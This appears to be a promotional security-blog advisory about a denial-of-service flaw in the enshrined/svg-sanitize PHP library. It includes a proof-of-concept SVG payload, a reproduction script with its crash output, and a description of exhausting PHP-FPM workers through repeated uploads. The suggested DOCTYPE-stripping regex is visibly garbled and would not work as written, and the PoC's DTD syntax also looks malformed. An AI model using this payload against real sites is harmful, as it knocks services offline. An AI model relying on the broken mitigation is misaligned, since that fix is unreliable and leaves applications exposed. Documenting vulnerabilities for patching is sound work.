Listen to this Post
A crafted Scalable Vector Graphics file containing an inline Document Type Definition with a fixed attribute default crashes the underlying PHP process when handled by enshrined/svg-sanitize versions through 0.22.x. During the sanitization process, the cleanAttributesOnWhitelist method invokes the DOMElement removeAttribute function twice on the exact same attribute name. The first call deletes the explicit element attribute, while the second call targets the DTD FIXED default node. This sequence triggers a type confusion error inside the PHP ext/dom extension, resulting in an immediate SIGABRT signal that terminates the PHP-FPM worker process and causes an application-wide denial of service on high-concurrency configurations.
DailyCVE Form:
Platform: enshrined/svg-sanitize
Version: through 0.22.x
Vulnerability: Denial of Service
Severity: Medium
date: 2026-09-25
Prediction: 2026-10-01
What Undercode Say:
Analytics
The vulnerability stems from the absence of DOCTYPE and DTD stripping prior to XML parsing in enshrined/svg-sanitize. When an attacker supplies a malformed or crafted SVG containing a DTD attribute declaration, the parsing phase creates an internal XML_ATTRIBUTE_DECL node. The sanitization pipeline executes a double-removal pattern where whitelist checking and href attribute safety routines sequentially call removeAttribute on the target attribute name. Because the first invocation successfully deletes the element attribute, the second invocation resolves to the remaining DTD declaration node, destabilizing memory pointers within the PHP DOM extension and inducing a fatal process crash with exit code 134.
Exploit: (Educational Purposes!)
Proof of concept exploit file (evil.svg):
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg [ <!ATTLIST svg badhref CDATA FIXED "javascript:alert(1)"> ]> <svg xmlns="http://www.w3.org/2000/svg" badhref="javascript:alert(1)" viewBox="0 0 100 100"> <rect width="100" height="100" fill="red"/> </svg>
Standalone reproduction script:
<?php
require_once 'vendor/autoload.php';
$svg = file_get_contents('evil.svg');
$sanitizer = new \enshrined\svgSanitize\Sanitizer();
$clean = $sanitizer->sanitize($svg);
echo "Sanitized: " . strlen($clean) . " bytes\n";
Executing the reproduction script or uploading through vulnerable integrations outputs:
$ php /tmp/test.php Sanitized: 157 bytes munmap_chunk(): invalid pointer $ echo $? 134
Protection: from this CVE
To protect applications against this denial of service vector, upgrade enshrined/svg-sanitize to version 1.0.0 or higher where DTD handling is properly secured. Alternatively, strip DOCTYPE and DTD declarations programmatically before passing content to the sanitizer parser:
$dirty = preg_replace('/<!DOCTYPE[^>](?:[.?])?\s>/si', '', $dirty);
Impact
Successful exploitation leads to a full-site denial of service. In a standard web environment configured with a limited pool of PHP-FPM workers, an attacker can dispatch concurrent requests containing the malicious SVG file to exhaust all available workers. Although master processes respawn workers automatically, a sustained automated loop ensures continuous termination of new processes, rendering the web application completely unavailable. Furthermore, abrupt process termination via SIGABRT bypasses register_shutdown_function handlers, potentially corrupting transaction states in applications like WordPress and WooCommerce by skipping crucial stock decrement routines or coupon tracking increments.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

